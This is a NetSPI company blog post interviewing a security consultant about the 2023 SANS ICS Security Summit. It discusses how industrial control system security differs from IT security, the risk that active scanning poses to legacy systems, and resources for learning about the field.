https://www.netspi.com/blog/executive-blog/personnel-development/q-and-a-michelle-eggers-ics-security-summit-and-training-2023/
Tue, 09 May 2023 14:00:00 +0000

NetSPI’s Associate Security Consultant Michelle Eggers shares her takeaways from ICS Security Summit & Training 2023.

The post Q&A with Michelle Eggers: An Inside Look at the SANS ICS Security Summit 2023 appeared first on NetSPI.

Most people rarely think about the systems that keep our world running. But every once in a while, it’s worth it to pause and reflect on the critical infrastructure that makes our society run smoothly. In this case, we‘re talking about the security of industrial control systems (ICS).  

When daily activities go as planned, everyone carries on, but if things go awry, what can be a bad day for IT applications can mean taking an entire system offline in the ICS arena. In some cases, this can be hazardous to human safety and potentially cause environmental disasters. In fact, there’s an entire conference dedicated to ICS — and we’ve got the inside scoop. 

NetSPI Security Consultant Michelle Eggers earned a scholarship from Dragos and SANS to attend the ICS Security Summit & Training 2023. The summit is a deep dive into the field of ICS security, creating the space to share ideas, methods, and techniques for safeguarding critical infrastructure. We caught up with Michelle to share her experience and recap educational takeaways, memorable moments, and why ICS security is an important field of focus.  

Q&A with Michelle Eggers on ICS Security Summit & Training 2023 

1. How would you summarize your experience at the SANS ICS Security Summit 2023? 

The SANS ICS Summit was a phenomenal opportunity to undergo a crash-course into many foundational aspects of Operational Technology (OT) and the current trends surrounding the technologies used to support critical infrastructure worldwide.  

I had the opportunity to sit in on the beta rollout of the new SANS ICS 310 course and took away many valuable insights, such as a comparative analysis on the ways in which ICS and IT security concerns are similar, and the areas in which they differ dramatically.  

Each talk during the summit provided relevant, actionable information for ICS asset owners and operators with recommendations for navigating the current threat landscape. As a note, ransomware is by far the biggest concern facing the field at this time. In short, the conference presented zero filler and instead focused on rich information directly applicable to real-world scenarios.

[Figure: SANS Five Critical Controls for ICS/OT]

2. What did you find most interesting in terms of tools used to secure ICS? 

Tooling wise, testing OT systems can be very similar to other types of penetration testing. The differences lie within the implementation. For example, Industrial Control Systems are often built on decades-old legacy hardware that may not be equipped to manage an active scan. In fact, something like a Nessus scan could easily knock out an entire system.  

While this situation may be a bad day for IT applications, in the ICS arena, taking a system offline can be hazardous to human safety and in extreme situations could even lead to an environmental disaster or loss of life.  

Cybersecurity for IT systems is built upon the CIA Triad model: Confidentiality, Integrity, and Availability. When working with operational technology, confidentiality is not the top priority; safety and availability instead play a much more crucial role. The impact goes beyond the potential loss or compromise of data or dollars and extends to potentially catastrophic effects in real-time, physical scenarios.  

3. How did you get introduced to ICS security? 

I first encountered the topic of ICS Security when I began my initial cybersecurity educational journey. It was not a large focus area but was mentioned in passing for general awareness purposes. I recall hearing at the time that air-gapped systems protect much of operational technology, but during the summit I came to understand that many OT systems are in fact networked and if there is an “air-gap” in place it is often a logical and not a physical separation, which as we know presents an opportunity for attacks that target bypassing security controls such as a misconfigured firewall. 

4. What makes you passionate about ICS security? 

Most people across the globe rely daily upon manufactured products or foods, critical infrastructure services (like healthcare), or utilities such as water or power to survive. The only way to escape the need for what OT provides us would be to live completely off grid, growing our own food, creating our own medicine, and so on.  

While this sounds ideal to some, the reality is very few people are actually living this way in industrialized countries. Industrial Control Systems are a crucial component of our daily lives whether we acknowledge it or not, and keeping these systems secure is of the utmost importance. 

5. Do you have a vision for how you could merge your pentesting skillset with operational technology (OT)? 

Ah, the dream! I would love to merge my existing interests in OSINT, Social Engineering, Physical Pentesting, and my current work in Web Application Penetration Testing with OT Pentesting into a well-rounded Red Team role that would assist organizations in securing their most vital assets in a multi-tiered and comprehensive approach.  

As far as OT testing branching out from Web App testing, many industrial control systems have some form of network connectivity that incorporates human-machine interfaces, and these can often present very similar vulnerabilities to IT systems regarding the authentication process. If forged remote authentication can be achieved to a workstation in control of a real-world, physical process you’ve got a very serious problem at hand. 

6. What tips do you have for security professionals looking to learn more about ICS security?  

Resources abound. Everything from YouTube to a basic browser search can provide a solid starting point for a better understanding of Operational Technology. I would recommend reading about the Colonial Pipeline cyberattack, studying up on Stuxnet and the Ukraine power grid attacks, and investigating any other infrastructure attacks of interest to gain a general idea of the OT landscape and what’s at stake.  

While at the conference I also had the opportunity to chat with Robert M. Lee, SANS ICS Fellow, who has put together a wonderful blog providing a list of resources for those interested in growing their knowledge base on ICS Cybersecurity, “A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity.” 

In addition, Dean Parsons has also released several free PDF resources on the subject, entitled “ICS Cybersecurity Field Manual” Volumes 1-3. These will also be available soon in a consolidated hardcopy edition as well. I managed to snag a signed first edition copy of his book at the Summit and it’s an excellent read, I wholeheartedly recommend adding it to any cybersecurity resource collection.  

If ICS security piques your interest, then you’ve got some reading to do! Connect with Michelle Eggers on LinkedIn for more OT insights and learn about NetSPI’s OT-centric offensive security services here.  

